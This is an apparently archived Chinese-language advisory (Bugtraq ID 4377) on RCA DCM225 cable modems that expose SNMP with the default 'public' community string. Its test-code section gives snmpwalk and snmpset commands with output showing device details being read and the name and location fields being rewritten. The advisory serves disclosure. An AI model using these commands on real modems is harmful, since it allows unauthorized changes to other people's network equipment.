RCA Digital Cable Modem public SNMP管理漏洞发布时间:2002-03-30 更新时间:2002-03-30 严重程度:中 威胁程度:服务器信息泄露 错误类型:设计错误 利用方式:服务器模式 BUGTRAQ ID:4377 受影响系统 RCA Digital Cable Modem 0.0DCM225E详细描述 RCA Digital Cable Modem是一款有线调制解调器。 存在公共通信串public,远程用户可以通过SNMP接口监听的10.0.0.0/8地址空间使用公共通信串进行查看,修改MODEM配置数据。 测试代码 <quote> [gabi@pluto gabi]$ snmpwalk 192.168.100.1 public system.sysDescr.0 = RCA DCM225 Cable Modem serial no. 65731049496572, HW_Version 025 (03.1), SW_Version ST05.14.00, Bootloader_Ver 11.1, OS: PSOS 2.5.0 system.sysObjectID.0 = OID: enterprises.2863.225.25.5.20.0 system.sysUpTime.0 = Timeticks: (141857) 0:23:38.57 system.sysContact.0 = unassigned sysContact system.sysName.0 = system.sysLocation.0 = system.sysServices.0 = 79 [gabi@pluto gabi]$ snmpset 192.168.100.1 public system.sysName.0 s lame system.sysName.0 = lame [gabi@pluto gabi]$ snmpset 192.168.100.1 public system.sysLocation.0 s lame_cyty system.sysName.0 = lame_city [gabi@pluto gabi]$ snmpwalk 192.168.100.1 public system.sysDescr.0 = RCA DCM225 Cable Modem serial no. 65731049496572, HW_Version 025 (03.1), SW_Version ST05.14.00, Bootloader_Ver 11.1, OS: PSOS 2.5.0 system.sysObjectID.0 = OID: enterprises.2863.225.25.5.20.0 system.sysUpTime.0 = Timeticks: (161396) 0:26:53.96 system.sysContact.0 = unassigned sysContact system.sysName.0 = lame system.sysLocation.0 = lame_city system.sysServices.0 = 79 </quote> 解决方案 尚无 相关信息 Gabriel A. Maggiotti <gmaggiot@ciudad.com.ar>. 参考:http://online.securityfocus.com/archive/1/264404 http://online.securityfocus.com/archive/1/264431 相关主页:http://www.rca.com/product/viewmodellist/browseproduct/0,2589,CI700094,00.html? |
